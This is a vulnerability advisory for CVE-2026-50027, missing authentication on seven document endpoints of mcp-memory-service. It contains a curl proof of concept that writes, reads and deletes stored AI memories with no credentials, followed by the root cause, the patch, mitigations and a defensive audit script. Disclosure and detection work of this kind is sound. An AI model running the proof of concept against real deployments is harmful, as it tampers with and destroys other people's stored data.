CVE-2026-50027: mcp-memory-service Missing Authentication on Document API Endpoints
All seven file/document endpoints in mcp-memory-service accepted requests without any credentials, letting anyone on the network read, write, or delete stored AI memories even when API-key or OAuth au
The problem
The FastAPI router in `documents.py` was instantiated as `router = APIRouter()` with no `dependencies=` argument, and the file never imported `Depends`. This meant every route under `/api/documents/*` (upload, batch-upload, status, history, remove, remove-by-tags, search-content) ran with no authentication check at all.
The sibling `memories.py` router correctly used `Depends(require_write_access)` on equivalent routes, so the authentication infrastructure existed and worked. The omission in `documents.py` created an inconsistent boundary that bypassed the entire auth layer. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Proof of concept
The proof of concept below runs against a deployment that has API-key or OAuth authentication enabled: step 1 confirms that auth is actually enforced on `/api/memories`, and steps 2 to 4 then write, read, and delete through the document routes with no credentials at all. Replace TARGET with the host running the HTTP server.
# Step 1: confirm auth IS enforced on /api/memories (expect 401)
curl -i http://TARGET:8000/api/memories
# HTTP/1.1 401 Unauthorized
# Step 2: write arbitrary content into the memory store -- no credentials
printf 'attacker-controlled content' > /tmp/poc.txt
UPLOAD_ID=$(
curl -s -X POST http://TARGET:8000/api/documents/upload \
-F "file=@/tmp/poc.txt" -F "tags=poc-tag" |
python3 -c 'import sys,json; print(json.load(sys.stdin)["upload_id"])'
)
# HTTP/1.1 200 OK {"upload_id": "<uuid>"}
# Step 3: read stored document content -- no credentials
curl -s "http://TARGET:8000/api/documents/search-content/$UPLOAD_ID"
# HTTP/1.1 200 OK (returns full document content)
# Step 4: delete all memories matching a tag -- no credentials
curl -i -X DELETE "http://TARGET:8000/api/documents/remove-by-tags" \
-H "Content-Type: application/json" \
-d '["poc-tag"]'
# HTTP/1.1 200 OK {"memories_deleted": 1}
Root cause
The root cause is CWE-306 (Missing Authentication for Critical Function). Because `documents.py` never imported `Depends` and instantiated its router without a `dependencies=` parameter, FastAPI had no dependency to run before any of the seven path operations, so the project's existing auth checks were simply never invoked for those routes.
Patch commit 907bac72 (shipped in 10.67.1) adds `Depends(require_write_access)` as a parameter on the write routes (upload, batch-upload, remove, remove-by-tags) and `Depends(require_read_access)` on the read routes (status, history, search-content). FastAPI builds each route's dependency graph when the route is registered and calls every dependency on each request before the path operation runs; a dependency that raises on a missing or invalid credential therefore rejects the request before any handler code executes. Adding the `Depends(...)` argument to each function signature is thus sufficient to put these routes behind the same auth logic that already protected `memories.py`.
The fix
Upgrade to mcp-memory-service 10.67.1 or later. The patch (commit 907bac72) adds `Depends(require_write_access)` or `Depends(require_read_access)` to every function signature in `documents.py`, bringing all seven `/api/documents/*` endpoints under the same authentication enforcement already present on `/api/memories/*`.
If you cannot upgrade immediately, remove network exposure of the HTTP server (bind it to 127.0.0.1 only, or place it behind an authenticating reverse proxy that rejects unauthenticated requests to `/api/documents/*`) until you can apply the patch. After upgrading, repeat step 2 of the proof of concept: an upload without credentials must now be rejected with 401 rather than returning an `upload_id`.
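A way to catch this class of omission before it ships, as an added example that is not code from mcp-memory-service or from the patch: a small stdlib-only audit that parses a FastAPI router module and reports every path operation not covered by an auth dependency. It checks the three places FastAPI accepts one (the `APIRouter(dependencies=[...])` constructor, the route decorator's `dependencies=[...]` keyword, and a `param = Depends(...)` default in the function signature). Only the dependency names `require_read_access` and `require_write_access` are taken from the advisory; the sample modules it runs against are constructed here to mirror the seven-route list and the before/after shapes described above, and the `op0`.. handler names and `get_storage` are hypothetical.

```python
"""Audit FastAPI router modules for path operations with no auth dependency
(the CWE-306 pattern behind CVE-2026-50027).

Added example: this is not code from mcp-memory-service or its patch. It
recognises auth in the three places FastAPI accepts a dependency: the
router constructor (APIRouter(dependencies=[...])), the route decorator
(@router.get(..., dependencies=[...])) and a function parameter whose
default is Depends(...). Only the auth dependency names come from the
advisory; the sample modules below are constructed stand-ins.
"""
import ast

AUTH_DEPS = {"require_read_access", "require_write_access"}  # names from the advisory
HTTP_METHODS = {"get", "post", "put", "patch", "delete", "api_route"}


def _dep_names(nodes):
    """Collect X for every Depends(X) found anywhere inside the given AST nodes."""
    names = set()
    for node in nodes:
        for sub in ast.walk(node):
            if (isinstance(sub, ast.Call) and isinstance(sub.func, ast.Name)
                    and sub.func.id == "Depends" and sub.args):
                target = sub.args[0]
                if isinstance(target, ast.Name):
                    names.add(target.id)
                elif isinstance(target, ast.Attribute):  # e.g. auth.require_read_access
                    names.add(target.attr)
    return names


def _router_level_deps(tree):
    """Map router variable -> dependency names passed to APIRouter(dependencies=[...])."""
    deps = {}
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Assign) and isinstance(node.value, ast.Call)):
            continue
        func = node.value.func
        func_name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
        if func_name != "APIRouter":
            continue
        kw = [k.value for k in node.value.keywords if k.arg == "dependencies"]
        for target in node.targets:
            if isinstance(target, ast.Name):
                deps[target.id] = _dep_names(kw)
    return deps


def audit_routes(source):
    """Return [(METHOD, path, protected)] for every @<router>.<method>(...) route."""
    tree = ast.parse(source)
    router_deps = _router_level_deps(tree)
    results = []
    for node in ast.walk(tree):
        if not isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        for deco in node.decorator_list:
            if not (isinstance(deco, ast.Call) and isinstance(deco.func, ast.Attribute)
                    and isinstance(deco.func.value, ast.Name)
                    and deco.func.attr in HTTP_METHODS):
                continue
            path = deco.args[0].value if deco.args and isinstance(deco.args[0], ast.Constant) else "?"
            found = set(router_deps.get(deco.func.value.id, ()))
            found |= _dep_names([k.value for k in deco.keywords if k.arg == "dependencies"])
            defaults = node.args.defaults + [d for d in node.args.kw_defaults if d is not None]
            found |= _dep_names(defaults)  # e.g. _: None = Depends(require_write_access)
            results.append((deco.func.attr.upper(), path, bool(found & AUTH_DEPS)))
    return results


def unprotected(source):
    """Routes that reach the handler without any of the auth dependencies."""
    return [(m, p) for m, p, ok in audit_routes(source) if not ok]


# Constructed stand-in for documents.py: the seven routes the advisory lists,
# generated without (vulnerable) or with (patched) a per-route auth dependency.
ROUTES = [("post", "/upload"), ("post", "/batch-upload"), ("get", "/status/{upload_id}"),
          ("get", "/history"), ("delete", "/remove/{upload_id}"),
          ("delete", "/remove-by-tags"), ("get", "/search-content/{upload_id}")]
WRITE_METHODS = {"post", "delete"}


def sample_module(patched):
    lines = ["from fastapi import APIRouter, Depends", "router = APIRouter()"]
    for i, (method, path) in enumerate(ROUTES):
        guard = ""
        if patched:
            dep = "require_write_access" if method in WRITE_METHODS else "require_read_access"
            guard = f", _: None = Depends({dep})"
        lines += [f"@router.{method}({path!r})", f"async def op{i}(arg: str = ''{guard}): ..."]
    return "\n".join(lines)


# Constructed: the same protection declared once on the router instead of per route;
# the unrelated Depends(get_storage) on the handler must not count as auth.
ROUTER_LEVEL = """
from fastapi import APIRouter, Depends
router = APIRouter(dependencies=[Depends(require_read_access)])
@router.get("/history")
async def history(storage=Depends(get_storage)): ...
"""

if __name__ == "__main__":
    for label, src in (("vulnerable", sample_module(False)), ("patched", sample_module(True)),
                       ("router-level", ROUTER_LEVEL)):
        print(f"{label}: {len(unprotected(src))} unprotected route(s) {unprotected(src)}")
```

To run it over a real checkout, call `unprotected(open("documents.py").read())` for each router module and fail the build if the list is non-empty. The check is deliberately name-based: a route that carries only an unrelated dependency such as `Depends(get_storage)` is still reported, because the question is whether one of the auth dependencies runs, not whether any dependency does.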
Related research
- CVE-2026-49291: mcp-memory-service Missing Authorization on MCP tools/call (high, CVSS 8.1)
- CVE-2026-49257: mcp-pinot-server Unauthenticated Remote Tool Invocation (critical, CVSS 10)
- motionEye LFI to Unauthenticated RCE Chain (critical, CVSS 9.8)
- CVE-2022-43467: Open Babel PQS Parser Out-of-Bounds Write (high, CVSS 7.8)